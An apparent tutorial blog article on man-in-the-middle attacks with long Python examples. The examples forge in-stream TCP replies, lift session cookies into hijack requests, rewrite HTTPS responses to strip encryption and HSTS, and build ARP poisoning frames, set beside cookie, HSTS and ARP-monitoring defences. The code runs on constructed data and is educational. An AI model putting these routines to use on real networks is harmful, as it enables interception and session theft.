What is a Man-in-the-Middle Attack and Techniques of Deployment

January 30, 2018 Author: virendra

Security is the top priority in networking and communications. Using untrusted public networks, whether wired or wireless, has long been known to be risky: most of us think twice before logging into a bank account or handling any kind of sensitive information over one. This article explains the man-in-the-middle attack.

Overview of man-in-the-middle attack

A man-in-the-middle (MITM) attack is a type of cyberattack in which a malicious actor inserts himself into a conversation between two parties, impersonates each party to the other, and gains access to the information the two parties were trying to send to each other. The attacker can intercept, alter, send and receive data meant for someone else, or data that was never meant to be sent at all, without either legitimate party noticing until it is too late. On the wired Internet the attacker must first obtain a position on the path between the two endpoints, for example on the same LAN segment, on a compromised router or by hijacking the route itself, and there are relatively few such places where he can do so and remain undetected. On wireless links the situation is quite different: unless the wireless last hop is properly secured, inserting oneself can be fairly easy, depending on the nature of the wireless link-layer protocol.

Man-in-the-middle attacks occur when the attacker manages to position himself between the legitimate parties to a conversation and spoofs each legitimate party to the other, so that every party believes it is talking to the expected counterpart. The key concepts of the man-in-the-middle attack are:

  • Man-in-the-middle is a type of eavesdropping attack that occurs when a malicious actor inserts himself as a relay or proxy into a communication session between people or systems.
  • A MITM attack exploits the real-time processing of transactions, conversations or transfers of other data.
  • Man-in-the-middle attacks allow attackers to intercept, send and receive data never meant for them, without either legitimate party knowing until it is too late.

Example

For example, suppose ABC and XYZ are communicating and King, the attacker, eavesdrops on their conversation. King is the man-in-the-middle, and in this case he performs a passive attack. If instead King interferes with the conversation, sending messages to ABC while pretending to be XYZ and to XYZ while pretending to be ABC, he performs an active attack in which neither ABC nor XYZ knows that the messages they receive are not from the real counterpart.

Figure 1: Man-in-the-Middle Attack example

Man-in-the-Middle Attack Techniques

Sniffing

Attackers use packet capture tools to inspect traffic at the packet level. A network interface put into promiscuous mode, or a wireless adapter put into monitor mode, hands the attacker frames that were never addressed to it, such as frames meant for other hosts. On a switched wired network, promiscuous mode alone yields only broadcast traffic and the attacker's own frames, so sniffing there usually depends on first redirecting traffic, for example with ARP poisoning. On Wi-Fi, monitor mode captures every frame in range, but the payload is readable only if the link is unencrypted or the attacker holds the network key.

Packet Injection

An attacker can also use the same monitoring-capable interface to inject malicious packets into an established data stream. Because the injected packets carry the addresses, ports and sequence numbers of a live connection, they blend in with the legitimate traffic and are accepted as part of the communication, although they are malicious in nature. Packet injection therefore usually starts with sniffing, which tells the attacker how and when to craft and send the packets.
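The sniff-then-inject sequence described in the Sniffing and Packet Injection sections, as an added example that is not part of the original article: a constructed client request frame is parsed the way a sniffer would parse it, and the addressing and sequence state recovered from it are used to craft a spoofed server reply with valid IPv4 and TCP checksums, which is the part a raw-socket injector must get right for the victim's stack to accept the segment. The MAC and IP addresses, ports and sequence numbers are constructed (documentation address ranges, locally administered MACs); nothing is sent on the wire.

```python
"""Sniff one TCP frame, then craft a segment that fits the same stream.

Added example with a constructed frame (documentation IP ranges, locally
administered MACs); nothing here touches a real network interface.
"""
import struct

ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
IPV4_HDR = struct.Struct("!BBHHHBBH4s4s")  # 20-byte IPv4 header without options
TCP_HDR = struct.Struct("!HHIIBBHHH")      # 20-byte TCP header without options
ETHERTYPE_IPV4, PROTO_TCP, PSH_ACK = 0x0800, 6, 0x18


def internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; a correctly checksummed buffer yields 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_tcp_frame(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port,
                    seq, ack, flags, payload=b"", ttl=64, ip_id=0):
    """Ethernet/IPv4/TCP with valid checksums: what an injector must get right."""
    tcp_len = TCP_HDR.size + len(payload)
    ip_hdr = IPV4_HDR.pack(0x45, 0, IPV4_HDR.size + tcp_len, ip_id, 0x4000,
                           ttl, PROTO_TCP, 0, src_ip, dst_ip)
    ip_hdr = ip_hdr[:10] + struct.pack("!H", internet_checksum(ip_hdr)) + ip_hdr[12:]
    tcp_hdr = TCP_HDR.pack(src_port, dst_port, seq, ack, (TCP_HDR.size // 4) << 4,
                           flags, 65535, 0, 0)
    # The TCP checksum also covers a pseudo-header built from the IP addresses.
    pseudo = struct.pack("!4s4sBBH", src_ip, dst_ip, 0, PROTO_TCP, tcp_len)
    csum = internet_checksum(pseudo + tcp_hdr + payload)
    tcp_hdr = tcp_hdr[:16] + struct.pack("!H", csum) + tcp_hdr[18:]
    return ETH_HDR.pack(dst_mac, src_mac, ETHERTYPE_IPV4) + ip_hdr + tcp_hdr + payload


def parse_frame(frame: bytes) -> dict:
    """What a sniffer pulls out: addressing plus the sequence state of the stream."""
    dst_mac, src_mac, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_IPV4:
        raise ValueError("not an IPv4 frame")
    ip = IPV4_HDR.unpack_from(frame, ETH_HDR.size)
    ihl = (ip[0] & 0x0F) * 4
    if ip[6] != PROTO_TCP:
        raise ValueError("not a TCP segment")
    tcp_start = ETH_HDR.size + ihl
    tcp = TCP_HDR.unpack_from(frame, tcp_start)
    payload = frame[tcp_start + (tcp[4] >> 4) * 4: ETH_HDR.size + ip[2]]
    return {"src_mac": src_mac, "dst_mac": dst_mac, "src_ip": ip[8], "dst_ip": ip[9],
            "src_port": tcp[0], "dst_port": tcp[1], "seq": tcp[2], "ack": tcp[3],
            "flags": tcp[5], "payload": payload}


def ip_checksum_ok(frame: bytes) -> bool:
    ihl = (frame[ETH_HDR.size] & 0x0F) * 4
    return internet_checksum(frame[ETH_HDR.size:ETH_HDR.size + ihl]) == 0


def tcp_checksum_ok(frame: bytes) -> bool:
    ip = IPV4_HDR.unpack_from(frame, ETH_HDR.size)
    segment = frame[ETH_HDR.size + (ip[0] & 0x0F) * 4: ETH_HDR.size + ip[2]]
    pseudo = struct.pack("!4s4sBBH", ip[8], ip[9], 0, PROTO_TCP, len(segment))
    return internet_checksum(pseudo + segment) == 0


def forge_server_reply(observed: dict, payload: bytes) -> bytes:
    """Spoof the server's answer to the sniffed request.

    Addresses and ports are mirrored; SEQ is what the client expects from the
    server (its own ACK) and ACK covers the request bytes just seen, so the
    client's stack accepts the segment as in-order data before the real reply
    arrives. Flags 0x14 (RST|ACK) instead would tear the connection down.
    """
    return build_tcp_frame(
        src_mac=observed["dst_mac"], dst_mac=observed["src_mac"],
        src_ip=observed["dst_ip"], dst_ip=observed["src_ip"],
        src_port=observed["dst_port"], dst_port=observed["src_port"],
        seq=observed["ack"], ack=observed["seq"] + len(observed["payload"]),
        flags=PSH_ACK, payload=payload)


# Constructed "capture": the client's request to the server, via the gateway.
CLIENT_MAC, GATEWAY_MAC = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
CLIENT_IP, SERVER_IP = bytes([198, 51, 100, 10]), bytes([203, 0, 113, 5])
CAPTURED = build_tcp_frame(CLIENT_MAC, GATEWAY_MAC, CLIENT_IP, SERVER_IP, 51234, 80,
                           seq=1000, ack=5000, flags=PSH_ACK,
                           payload=b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n")

if __name__ == "__main__":
    observed = parse_frame(CAPTURED)
    injected = forge_server_reply(observed, b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
    print(parse_frame(injected), ip_checksum_ok(injected), tcp_checksum_ok(injected))
```

The injected reply wins only if it reaches the client before the genuine one; the client then treats the real server's segment, which carries the same sequence number, as a duplicate and discards it. On a real interface the frame would be written to a raw socket, which requires root, and the receiving stack silently drops any segment whose checksums or sequence numbers are off, which is why the example verifies both.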

Session Hijacking

Most web applications authenticate the user once and then issue a temporary session token that accompanies every later request, so the user does not have to type a password on every page. An attacker who can sniff the traffic can pick out a user's session token and attach it to requests of his own, which the application then treats as the user's. Once he holds the token, the attacker no longer needs to spoof anything; he is simply another client presenting valid credentials. The token is exposed to sniffing only when it travels in the clear, over plain HTTP or over HTTPS that has been stripped as described in the next section, which is why session cookies should be marked Secure and only ever sent over HTTPS.
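The hijack described above at the HTTP level, as an added example that is not part of the original article: a constructed plaintext request is parsed, the cookie that looks like a session identifier is picked out, a request the attacker can send himself is built around it, and the server's earlier Set-Cookie headers are checked for which cookies a browser would also send over plain HTTP. The host name bank.example, the cookie names and values, and the name-based heuristic for spotting a session cookie are all assumptions.

```python
"""Session hijacking from a sniffed plaintext HTTP exchange (added example).

Request, response, host name and cookie names are constructed here;
the session-name heuristic is an assumption, not a standard.
"""

# Constructed capture: one request the victim's browser sent over plain HTTP.
CAPTURED_REQUEST = (
    b"GET /account/summary HTTP/1.1\r\n"
    b"Host: bank.example\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: theme=dark; SESSIONID=8f3c21a9d0e47b6c; lang=en\r\n"
    b"\r\n"
)

# Constructed capture: the server response that issued the cookies earlier.
CAPTURED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: SESSIONID=8f3c21a9d0e47b6c; Path=/; HttpOnly\r\n"
    b"Set-Cookie: csrf=77aa; Path=/; Secure; HttpOnly\r\n"
    b"Set-Cookie: theme=dark; Path=/\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# Name fragments that commonly mark a session identifier (heuristic).
SESSION_NAME_HINTS = ("session", "sess", "sid", "auth", "token")


def parse_head(raw: bytes):
    """Split an HTTP message into (first line, {lower-cased name: [values]})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def parse_cookie_header(value: str) -> dict:
    """'a=1; b=2' -> {'a': '1', 'b': '2'}"""
    cookies = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            cookies[name] = val
    return cookies


def extract_session_tokens(raw_request: bytes) -> dict:
    """Cookies in a sniffed request whose names look like session identifiers."""
    _, headers = parse_head(raw_request)
    tokens = {}
    for header_value in headers.get("cookie", []):
        for name, value in parse_cookie_header(header_value).items():
            if any(hint in name.lower() for hint in SESSION_NAME_HINTS):
                tokens[name] = value
    return tokens


def forge_request(host: str, path: str, tokens: dict) -> bytes:
    """The hijacker's own request: no password, no spoofing, just the victim's token."""
    cookie = "; ".join(f"{k}={v}" for k, v in tokens.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n".encode()


def cookies_exposed_over_http(raw_response: bytes) -> list:
    """Cookies set without the Secure attribute.

    A browser sends these on plain-HTTP requests as well, where a sniffer
    can read them; HttpOnly does not change that, it only hides the cookie
    from scripts in the page.
    """
    _, headers = parse_head(raw_response)
    exposed = []
    for set_cookie in headers.get("set-cookie", []):
        first, *attrs = [p.strip() for p in set_cookie.split(";")]
        name = first.partition("=")[0]
        if not any(a.lower() == "secure" for a in attrs):
            exposed.append(name)
    return exposed


if __name__ == "__main__":
    tokens = extract_session_tokens(CAPTURED_REQUEST)
    print(tokens)
    print(forge_request("bank.example", "/account/transfer", tokens).decode())
    print(cookies_exposed_over_http(CAPTURED_RESPONSE))
```

In the constructed response the session cookie carries HttpOnly but not Secure, so the victim's browser hands it to a sniffer on the first plain-HTTP request; the csrf cookie, marked Secure, never leaves the browser except over HTTPS. A name-based heuristic is what an attacker sifting a large capture actually uses, and it is also why reviewers check that the cookie the application really treats as its session carries the Secure attribute rather than relying on its name.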

SSL Stripping

HTTPS blunts the interception that ARP or DNS spoofing makes possible, because an attacker who has inserted himself into the path still cannot read or alter the encrypted traffic. SSL stripping works around this. The attacker intercepts the victim's plaintext requests, speaks HTTPS to the real server himself, and rewrites the https:// links and redirects in the server's responses to their http:// equivalents, so the victim keeps making unencrypted requests through the attacker while the server sees a normal encrypted session. Everything the victim sends, including passwords and cookies, is then leaked in plain text. The attack depends on the victim's browser sending at least one plain-HTTP request to begin with; HTTP Strict Transport Security (HSTS), and especially the browser preload list, makes the browser refuse to use HTTP for a site it knows, which defeats the downgrade.
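The rewriting a downgrade proxy has to perform on a server response, beside the browser-side HSTS state that defeats it, as an added example that is not part of the original article and not the code of any particular stripping tool: Location headers and body links are rewritten from https:// to http://, the Strict-Transport-Security header is dropped, and the Secure attribute is removed from cookies so the downgraded session keeps working. The response, the host names shop.example and pay.example and the timestamps are constructed.

```python
"""What a downgrade ("SSL stripping") proxy does to a server response, and the
HSTS state in the browser that defeats it (added example, constructed data).
"""
import re

HTTPS_URL = re.compile(rb"https://([A-Za-z0-9.-]+)")

# Constructed: what the real server returned to the proxy over HTTPS.
SERVER_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: https://shop.example/login\r\n"
    b"Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    b"Set-Cookie: SESSIONID=4c9e1; Path=/; Secure; HttpOnly\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b'<a href="https://shop.example/cart">Cart</a> '
    b'<a href="https://pay.example/checkout">Pay</a>'
)


def downgrade_response(raw: bytes):
    """Rewrite the response so the victim keeps talking plain HTTP to the proxy.

    Returns (rewritten response, hosts whose https:// links were rewritten).
    The proxy must remember those hosts: the victim's later http:// requests
    to them have to be upgraded back to HTTPS towards the real server.
    """
    stripped_hosts = set()

    def to_http(match):
        stripped_hosts.add(match.group(1).decode("latin-1"))
        return b"http://" + match.group(1)

    head, sep, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    out = [lines[0]]
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        lname = name.strip().lower()
        if lname == b"strict-transport-security":
            continue  # would make the browser refuse plain HTTP on the next visit
        if lname == b"location":
            value = HTTPS_URL.sub(to_http, value)  # redirect-to-HTTPS becomes redirect-to-HTTP
        elif lname == b"set-cookie":
            # A Secure cookie is never sent over HTTP; drop the flag or the session breaks.
            value = b";".join(p for p in value.split(b";") if p.strip().lower() != b"secure")
        out.append(name + b":" + value)
    body = HTTPS_URL.sub(to_http, body)
    return b"\r\n".join(out) + sep + body, stripped_hosts


def learn_hsts(raw_response: bytes, host: str, now: int, store: dict) -> None:
    """Browser side: remember an HSTS policy seen in an untampered response."""
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "strict-transport-security":
            match = re.search(r"max-age=(\d+)", value)
            if match:
                store[host] = now + int(match.group(1))


def hsts_blocks_downgrade(host: str, now: int, store: dict) -> bool:
    """With a live HSTS entry the browser upgrades http:// itself and never
    sends the plaintext request the proxy needs to rewrite."""
    expiry = store.get(host)
    return expiry is not None and expiry > now


if __name__ == "__main__":
    rewritten, hosts = downgrade_response(SERVER_RESPONSE)
    print(rewritten.decode("latin-1"))
    print(sorted(hosts))
```

The race the last paragraph describes is visible in the two HSTS functions: a browser that has once received the genuine response refuses the downgrade for a year, but a browser that has never visited the site, and has no preload entry for it, has nothing stored when the first http:// request goes out, and the proxy removes the very header that would have taught it.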

Different Types of Man in the Middle attack

As you can imagine, the subject is complex and there is not simply 'one type of man-in-the-middle attack'; rather, the term describes a category of attacks. Here are a few of the techniques used to obtain the man-in-the-middle position:

  • ARP poisoning
  • Wi-Fi WEP/WPA/WPA2 hacking
  • DNS spoofing
  • STP mangling
  • Port stealing
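ARP poisoning, the first item in the list above, as an added example that is not part of the original article: the two forged, unsolicited ARP replies that make the victim send gateway-bound traffic to the attacker and the gateway send victim-bound traffic to the attacker, next to an arpwatch-style monitor that learns IP-to-MAC bindings and reports a binding that changes or a frame whose Ethernet source differs from its ARP sender address. Addresses are constructed (a documentation IP range and locally administered MACs); nothing is transmitted.

```python
"""ARP poisoning: the forged replies that put an attacker between a victim and
its gateway, and a monitor that flags them (added example, constructed data).
"""
import struct

ETH = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
ARP = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST, ZERO_MAC = b"\xff" * 6, b"\x00" * 6

# Constructed addresses: 198.51.100.0/24 is a documentation range.
GATEWAY_MAC = bytes.fromhex("020000000001")
VICTIM_MAC = bytes.fromhex("020000000002")
ATTACKER_MAC = bytes.fromhex("02000000beef")
GATEWAY_IP = bytes([198, 51, 100, 1])
VICTIM_IP = bytes([198, 51, 100, 20])


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, eth_dst=None):
    """One ARP packet in an Ethernet frame. In a poisoning reply, sender_* is the lie."""
    return (ETH.pack(eth_dst or target_mac, sender_mac, ETHERTYPE_ARP)
            + ARP.pack(1, 0x0800, 6, 4, op, sender_mac, sender_ip, target_mac, target_ip))


def poison_pair(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The two unsolicited replies an attacker repeats to hold the middle position:
    'gateway is at attacker' to the victim, 'victim is at attacker' to the gateway."""
    to_victim = build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp(ARP_REPLY, attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def parse_arp(frame: bytes):
    dst, src, ethertype = ETH.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    _, _, _, _, op, sha, spa, tha, tpa = ARP.unpack_from(frame, ETH.size)
    return {"eth_src": src, "op": op, "sha": sha, "spa": spa, "tha": tha, "tpa": tpa}


class ArpMonitor:
    """Learns IP -> MAC from ARP traffic and reports claims that contradict it.

    Static entries (for example the gateway) are trusted and never overwritten,
    so every forged reply against them raises an alert instead of being learnt.
    """

    def __init__(self, static=None):
        self.table = dict(static or {})  # ip bytes -> mac bytes
        self.alerts = []

    def observe(self, frame: bytes) -> None:
        arp = parse_arp(frame)
        if arp is None:
            return
        if arp["sha"] != arp["eth_src"]:
            # Spoofing tools that forge the Ethernet source often forget the ARP field.
            self.alerts.append(("eth/arp sender mismatch", arp["spa"], arp["eth_src"], arp["sha"]))
        known = self.table.get(arp["spa"])
        if known is None:
            self.table[arp["spa"]] = arp["sha"]
        elif known != arp["sha"]:
            self.alerts.append(("ip changed mac", arp["spa"], known, arp["sha"]))


if __name__ == "__main__":
    monitor = ArpMonitor(static={GATEWAY_IP: GATEWAY_MAC})
    monitor.observe(build_arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, ZERO_MAC, GATEWAY_IP, BROADCAST))
    monitor.observe(build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP))
    for frame in poison_pair(ATTACKER_MAC, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP):
        monitor.observe(frame)
    for alert in monitor.alerts:
        print(alert[0], alert[1], alert[2].hex(":"), "->", alert[3].hex(":"))
```

The legitimate request and reply teach the monitor nothing alarming; the first poisoned frame trips the static gateway entry and the second trips the binding learnt from the victim's own request. Because hosts accept unsolicited replies and the attacker must keep resending them before the caches expire, the same two alerts recur every few seconds during a real attack, which is what makes this kind of monitoring, or a switch's dynamic ARP inspection, effective against it.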

